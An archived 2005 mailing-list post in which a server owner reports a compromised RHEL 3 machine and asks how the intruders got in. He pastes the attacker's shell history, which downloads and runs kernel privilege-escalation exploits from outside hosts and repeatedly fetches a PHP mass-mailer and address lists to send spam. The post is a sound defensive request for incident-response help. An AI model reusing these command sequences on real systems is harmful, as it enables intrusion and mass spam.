Mailing List
Home
Forum Home
Linux - General Red Hat Linux discussion list
Enterprise Linux 3 - Discussion of Red Hat Enterprise Linux 3 (Taroon)
Installation - Getting started with Red Hat Linux
Red Hat Linux 9 - Discussion of Red Hat Linux 9 (Shrike)
Red Hat Linux 7.3 - Discussion of Red Hat Linux 7.3 (Valhalla)
Red Hat Linux 7.2 - Discussion of Red Hat Linux 7.2 (Enigma)
Apache Web Server
Oracle database, Microsoft SQL server ...
Subjects
application/x mplayer2 plugin
RPM error: db4 error(16) from dbenv >remove: Device or resource
   busy
Command stream end of file while reading
X Windows problem (xauth)
Upgrading openoffice 1 1 rpm
FTP: connection refused
FTP: connection refused
mount: /dev/cdrom: is not a valid block device
Dell Precision 650, RedHat 9, no sound
how to trace the cause resulting in the crash of bind server
Virus on the list
UNINSTALL RPM MYSQL
usb pen drives: mounting as a user
broadcom network interface
make mrproper
sendmail configuration on redhat
Couldn 't open PID file /var/run/named/named pid Permission denied
Promise 378 controller
kernel 2 6 and /dev/sound/mixer not found
Problem using up2date
mrtg step by step howto/configuration for a newbie?
Compiling and Installing Kernel 2 6
Can 't locate module ppp0, can 't locate module ppp compress 21
HOW I CAN MAKE BOOTABLE FLOPPY DISKET
Lotus Notes under Wine
/etc/security/limits conf question
Intel E/1000 driver
Command stream end of file while reading
rpm database corrupt
qla2300 modules
 
Search:  
Power your search with and, or, +, -, or "some phrase" operators.
Hacked...

Hacked...

2005-03-09       - By Aviram Carmi

 Back
Reply:     1     2     3     4     5     6  

Hi all,

One of my machines RHEL 3 update 4 with all current patches up2date
applied daily as needed, was hacked/cracked...

I am not sure how they got into the machine, probably via a broken
cgi script, since all files were owned by apache:apache.

How do I find out how they got in?

maybe some buggy php script, possibly perl? I deleted all file, so it
is harder to track down, but there was also a file called r0nin in
there which is not mentioned in the .bash_history (see below), so it
might have been the initial entry point?

I've removed all the files, but kept .bash_history

I do not have a wget or a curl command any more, well I do, but they
now look like this shell script:

{ echo $0 $* ; echo ps;  ps -egxuwc; echo who; who -aH; echo set;
set; echo ;  } | mail -s $0 avi@(protected)

what other information should I be collecting for wget execution attempts?


FYI, this is the .bash_history, however they execute  these commands,
they do seem to see the output of the commands, otherwise why execute
"id"?

cd /var/tmp
wget http://www.albany-toyota.co.nz/release/elflbl
chmod 777 elflbl
./elflbl
id
./elflbl -n3
id
./elflbl -f switch
id
wget http://www.freewebs.com/swcbreaker/xpl/uselib24
chmod 777 uselib24
./uselib24
cd /var/tmp
wget
http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco.html
wget http://paginas.terra.com.br/informatica/carteirovox/enviar.txt
wget http://paginas.terra.com.br/informatica/carteirovox/listmail120000.txt
wget http://paginas.terra.com.br/informatica/carteirovox/listmail120000.txt
wget http://paginas.terra.com.br/informatica/carteirovox/igmail.txt
php -q enviar.txt igmail.txt carteiro_vox_marco.html
wc -l ok.txt
/var/mail/apache
cd /var/tmp
wget
http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco.html
wget
wget http://paginas.terra.com.br/informatica/carteirovox/enviar.txt
wget http://paginas.terra.com.br/informatica/carteirovox/letra.txt
wget http://paginas.terra.com.br/informatica/carteirovox/LetraA.txt
php -q enviar.txt LetraA.txt carteiro_vox_marco.html
cd /var/tmp
wget http://paginas.terra.com.br/informatica/carteirovox/enviar.txt
http://paginas.terra.com.br/informatica/carteirovox/email0.txt
wget http://paginas.terra.com.br/informatica/carteirovox/email0.txt
http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco.html
wget
http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco.html
php -q enviar.txt email0.txt carteiro_vox_marco.html
php -q enviar.txt list.txt carteiro_vox_marco.html
wget http://paginas.terra.com.br/informatica/carteirovox/listmail120000.txt
http://paginas.terra.com.br/informatica/carteirovox/listmail120000.txt
wget http://paginas.terra.com.br/informatica/carteirovox/listmail120000.txt
wget http://paginas.terra.com.br/informatica/carteirovox/list4.txt
wget http://paginas.terra.com.br/informatica/carteirovox/list4.txt
wget http://paginas.terra.com.br/informatica/carteirovox/list4.txt
wget
http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco.html
wget http://paginas.terra.com.br/informatica/carteirovox/list4.txt
wget http://paginas.terra.com.br/informatica/carteirovox/lista4.txt
wget http://paginas.terra.com.br/informatica/carteirovox/lista4.txt
wget http://paginas.terra.com.br/informatica/carteirovox/enviar.txt
php -q enviar.txt lista4.txt carteiro_vox_marco.html
cd /var/tmp
wget
http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco.html
wget http://paginas.terra.com.br/informatica/carteirovox/enviar.txt
rm listmail120000.txt
Cannot write to `enviar.txt.5' (No space left on device).

wget http://paginas.terra.com.br/informatica/carteirovox/enviar.txt

cd /var/tmp
wget
http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco.html
php -q enviar.txt list.txt carteiro_vox_marco.html
php -q enviar.txt listmail120000.txt carteiro_vox_marco.html
php -q enviar.txt igmail.txt carteiro_vox_marco.html
cd /var/tmp
wget
http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco.html
wget http://paginas.terra.com.br/informatica/carteirovox/mail.txt
wget http://paginas.terra.com.br/informatica/carteirovox/enviar.txt
wget http://paginas.terra.com.br/informatica/carteirovox/mail.txt
rm listmail120000.txt
rm LetraA.txt
rm letra.txt
wget http://paginas.terra.com.br/informatica/carteirovox/mail.txt
php -q enviar.txt mail.txt carteiro_vox_marco.html
cd /var/tmp
wget http://paginas.terra.com.br/informatica/carteirovox/mail.txt
rm mail.txt.2
php -q enviar.txt mail.txt carteiro_vox_marco.html
cd /var/tmp
ls
rm busy.htm.8
rm carteiro_vox_marco.html.1
rm carteiro_vox_marco.html.2
rm carteiro_vox_marco.html.3
rm carteiro_vox_marco.html.4
rm carteiro_vox_marco.html.5
rm carteiro_vox_marco.html.6
rm carteiro_vox_marco.html.7
rm carteiro_vox_marco.html.8
rm carteiro_vox_marco.html.9
rm lista4.txt
rm mail.txt.1
rm enviar.txt.1
rm enviar.txt.2
rm enviar.txt.3
rm enviar.txt.4
rm enviar.txt.5
rm enviar.txt.6
rm enviar.txt.7
rm igmail.txt
rm letra.txt.1
rm carteiro_vox_marco.html.1
rm carteiro_vox_marco.html.2
php -q enviar.txt ok.txt carteiro_vox_marco.html
cd /var/tmp
wget http://paginas.terra.com.br/informatica/carteirovox/enviar.txt
wget http://paginas.terra.com.br/informatica/carteirovox/carteiro_ox_marco.html
wget http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco
wget
http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco.html
wget http://paginas.terra.com.br/informatica/carteirovox/listmailgeneral.txt
wget http://paginas.terra.com.br/informatica/carteirovox/listmailgeneral.txt
wget http://paginas.terra.com.br/informatica/carteirovox/listmailgeneral.txt
php -q enviar.txt listmailgeneral.txt carteiro_vox_marco.html
 php -q enviar.txt listmailgeneral.txt carteiro_vox_marco.html
 php -q enviar.txt listmailgeneral.txt carteiro_vox_marco.html
php -q enviar.txt listmailgeneral.txt carteiro_vox_marco.html
cd /dev/shm
wget http://paginas.terra.com.br/informatica/carteirovox/enviar.txt
wget
http://paginas.terra.com.br/informatica/carteirovox/carteiro_vox_marco.html
wget http://paginas.terra.com.br/informatica/carteirovox/listmailgeneral.txt
php -q enviar.txt listmailgeneral.txt carteiro_vox_marco.html

--

Aviram Carmi
Owner
Executive Vice President, Technology

Over TheNet (R)
601 Daily Drive Suite #226
Camarillo, CA 93010-5840

http://www.otn.com/   Building Profitable Web Sites Today
(805) 384-1144 Voice  (805) 384-9111 FAX

(C) Copyright 2005, Over TheNet (R)  All rights reserved.
--

Aviram Carmi
Owner
Executive Vice President, Technology

Over TheNet (R)
601 Daily Drive Suite #226
Camarillo, CA 93010-5840

http://www.otn.com/   Building Profitable Web Sites Today
(805) 384-1144 Voice  (805) 384-9111 FAX

(C) Copyright 2004, Over TheNet (R)  All rights reserved.

--
Taroon-list mailing list
Taroon-list@(protected)
http://www.redhat.com/mailman/listinfo/taroon-list

Earn $52 per hosting referral at Lunarpages.